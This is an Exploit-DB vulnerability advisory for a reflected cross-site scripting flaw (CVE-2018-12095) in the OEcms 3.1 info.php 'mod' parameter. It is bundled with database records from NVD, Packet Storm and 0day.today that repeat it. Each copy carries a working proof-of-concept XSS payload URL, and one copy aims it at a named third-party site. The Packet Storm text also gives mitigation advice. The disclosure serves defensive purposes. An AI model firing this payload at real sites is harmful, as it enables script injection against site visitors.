# Title: OEcms 3.1 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-06-15
# Software: OEcms v3.1
# CVE: CVE-2018-12095
# Technical Details & Description:
# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application.
# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.
# PoC
http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>
{"id": "EDB-ID:44895", "hash": "a899d7d470a13d0a8e5a290634cc68ba", "type": "exploitdb", "bulletinFamily": "exploit", "title": "OEcms 3.1 - Cross-Site Scripting", "description": "OEcms 3.1 - Cross-Site Scripting. CVE-2018-12095. Webapps exploit for PHP platform", "published": "2018-06-15T00:00:00", "modified": "2018-06-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/44895/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-12095"], "lastseen": "2018-06-15T10:37:18", "history": [], "viewCount": 39, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2018-06-15T10:37:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-12095"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148142"]}, {"type": "zdt", "idList": ["1337DAY-ID-30591"]}], "modified": "2018-06-15T10:37:18"}, "vulnersScore": 2.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/44895/", "sourceData": "# Title: OEcms 3.1 - Cross-Site Scripting \r\n# Author: Felipe \"Renzi\" Gabriel\r\n# Date: 2018-06-15\r\n# Software: OEcms v3.1\r\n# CVE: CVE-2018-12095\r\n \r\n# Technical Details & Description:\r\n# A Reflected Cross-Site Scripting web vulnerability has been discovered in the \"OEcms v3.1\" web-application.\r\n# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.\r\n \r\n# PoC\r\n \r\nhttp://Target/cms/info.php?mod=list\"</|\\><plaintext/onmouseover=prompt(/XSS/)>", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:19:44", "bulletinFamily": "NVD", "description": "A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.", "modified": "2018-08-01T15:07:00", "id": "CVE-2018-12095", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12095", "published": "2018-06-11T11:29:00", "title": "CVE-2018-12095", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2018-06-13T06:21:04", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-12T00:00:00", "published": "2018-06-12T00:00:00", "id": "PACKETSTORM:148142", "href": "https://packetstormsecurity.com/files/148142/OEcms-3.1-Cross-Site-Scripting.html", "title": "OEcms 3.1 Cross Site Scripting", "type": "packetstorm", "sourceData": "`Title: \n======= \nOEcms v3.1 - Reflected Cross-Site Scripting \n \nIntroduction: \n============== \nA content management system (CMS) is a computer application that supports the creation and modification of digital content. \nIt is often used to support multiple users working in a collaborative environment. \nCMS features vary widely. Most CMSs include Web-based publishing, format management, history editing and version control, indexing, search, and retrieval. \nBy their nature, content management systems support the separation of content and presentation. \n \nVulnerability Disclosure: \n========================== \n2018-06-10: Public Disclosure \n \nCVE - ID: \n========== \nCVE-2018-12095 \n \nAffected Product(s): \n===================== \nOEcms v3.1 \n \nExploitation Technique: \n======================== \nRemote \n \nSeverity Level: \n================ \nHigh \n \nTechnical Details & Description: \n================================= \nA Reflected Cross-Site Scripting web vulnerability has been discovered in the \"OEcms v3.1\" web-application. \nThe vulnerability is located in the 'mod' parameter of the`info.php` action GET method request. \n \nRequest Method(s): \n \n[+] GET \n \nVulnerable Function(s): \n \n[+] info.php \n \nVulnerable Parameter(s): \n \n[+] mod \n \nProof of Concept (PoC): \n======================== \nCross-Site Scripting, also known as XSS, is one of the most common attacks carried out in web applications. \nThe concept of XSS is to manipulate the client-side scripts of a web application to perform actions planned by a malicious user. \nReflected Cross-Site Scripting occurs when data sent by the attacker to the application is displayed on the page without the need to be stored somewhere. \n \n[+] http://www.fullviewgarden.com/cms/info.php?mod=list\"</|\\><plaintext/onmouseover=prompt(/XSS/)> \n \nSolution \n========= \nFor a prevention of Cross Site Scripting, some measures should be considered: \nNever enter untrusted data except in locations defined for this purpose. \nThe principle of this rule is to deny everything and mostly do not JavaScript code from an unknown source and then run it. \nValidate the escape characters before inserting them inside the HTML element. Failure to validate inputs may allow malicious code to be injected into the application. \nValidate URL parameters and check information that sends our HTTP requests, hex escapes us in URLs such as% 25, aawhere 25 is the ASCII code of the character \"%\". \nAvoid HTML injection attacks by resorting to libraries that parse the inserted HTML such as: HtmlSanitizer, OWASP Java HTML Sanitizer. \nAnother recommendation to mitigate such security flaws in a web application is an application of a Web Application Firewall (WAF) such as ModSecurity, Ironbee and others. \n \nCredits \n======== \nFelipe \"Renzi\" Gabriel \n \nContact \n======== \nrenzi@linuxmail.org \n \nReferences \n========== \nhttp://projects.webappsec.org/Cross-Site-Scripting \nhttp://cwe.mitre.org/data/definitions/79.html \nhttps://www.owasp.org/index.php/Cross-site_Scripting_(XSS) \nhttps://en.wikipedia.org/wiki/Content_management_system \nhttps://cxsecurity.com/issue/WLB-2018060092 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148142/oecms31-xss.txt"}], "zdt": [{"lastseen": "2018-06-16T05:34:27", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-06-16T00:00:00", "published": "2018-06-16T00:00:00", "id": "1337DAY-ID-30591", "href": "https://0day.today/exploit/description/30591", "title": "OEcms 3.1 - Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Title: OEcms 3.1 - Cross-Site Scripting \r\n# Author: Felipe \"Renzi\" Gabriel\r\n# Software: OEcms v3.1\r\n# CVE: CVE-2018-12095\r\n \r\n# Technical Details & Description:\r\n# A Reflected Cross-Site Scripting web vulnerability has been discovered in the \"OEcms v3.1\" web-application.\r\n# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.\r\n \r\n# PoC\r\n \r\nhttp://Target/cms/info.php?mod=list\"</|\\><plaintext/onmouseover=prompt(/XSS/)>\n\n# 0day.today [2018-06-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30591"}]}